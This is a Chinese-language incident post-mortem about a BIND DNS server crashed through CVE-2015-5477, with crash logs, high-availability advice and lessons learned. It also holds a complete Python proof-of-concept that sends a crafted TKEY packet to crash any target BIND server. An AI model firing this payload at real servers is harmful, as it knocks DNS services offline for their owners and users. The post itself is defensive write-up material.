DNS服务器被攻击 今天给大家说说我们的DNS服务器被攻击及解决办法。
问题现象
今天上午10:30左右,公司的DNS服务器被攻击,导致平台部分服务不能访问。这时最先报警的是Zabbix,报出大量的主机宕机了。接到Zabbix报警后,赶紧登陆一台被监控节点,发现Zabbix agent进程是存在的,但是不能ping通Zabbix server节点,说明DNS出现了问题。
登陆DNS服务器,发现bind进程已经不存在了。赶紧查看日志,发现有如下的错误:
代码语言:javascript复制03-Jan-2017 10:28:22.208 general: critical: message.c:2335: REQUIRE(*name == ((void *)0)) failed, back trace
03-Jan-2017 10:28:22.208 general: critical: #0 0x417a3b in assertion_failed() 0x4b
03-Jan-2017 10:28:22.208 general: critical: #1 0x5d04ba in isc_assertion_failed() 0xa
03-Jan-2017 10:28:22.208 general: critical: #2 0x4afd13 in dns_message_findname() 0x143
03-Jan-2017 10:28:22.208 general: critical: #3 0x557d84 in dns_tkey_processquery() 0x184
03-Jan-2017 10:28:22.208 general: critical: #4 0x42ea10 in ns_query_start() 0x3c0
03-Jan-2017 10:28:22.208 general: critical: #5 0x40d44a in client_request() 0xa3a
03-Jan-2017 10:28:22.208 general: critical: #6 0x5f2dcb in run() 0x2ab
03-Jan-2017 10:28:22.208 general: critical: #7 0x348d2079d1 in _fini() 0x348cbfb139
03-Jan-2017 10:28:22.208 general: critical: #8 0x348cae886d in _fini() 0x348c4dbfd5
03-Jan-2017 10:28:22.208 general: critical: exiting (due to assertion failure)
这个就是2015年7月份爆出的CVE-2015-5477漏洞(拒绝服务漏洞),受影响的bind版本为9.x系列。由于TKEY查询的错误可导致BIND服务器发生REQUIRE断言失败并停止服务,攻击者利用漏洞可恶意构造数据包,导致TKEY记录查询错误,进而导致BIND服务器发生REQUIRE断言失败并停止服务。
解决办法
升级新版本的bind,然后进行测试,验证是否还存在此漏洞。测试脚本为:
代码语言:javascript复制#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' sys.argv[0] ' [target]')
sys.exit(1)
print('Sending packet to ' sys.argv[1] ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff
03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
上面的脚本具有一定的攻击性,请大家不要随便使用。不过可以针对自己家公司的DNS服务器进行内测,如果发现有问题,则赶紧升级DNS软件。
如何做到bind进程的高可用行:
- 操作系统需要被监控(系统不监控会被打死的),监控系统是否宕机
- 进程需要做到高可用(使用supervisor来管理进程),named进程异常退出可以自动启动
- 监控named进程,进程不存在则报警
事后总结
上班第一天就遇到此问题,犹如当头一棒,让我清醒了很多。还是没有做到位,这台机器没有做任何监控。这次遇到这个问题,没有第一时间抓紧恢复,而是解决Zabbix问题。
针对上述发生的问题,汲取了如下几点经验教训:
- 遇到故障问题,抓紧时间恢复是第一要务
- 复盘故障问题,找出根本原因
- 找出解决故障或问题的办法或如何避免类似的故障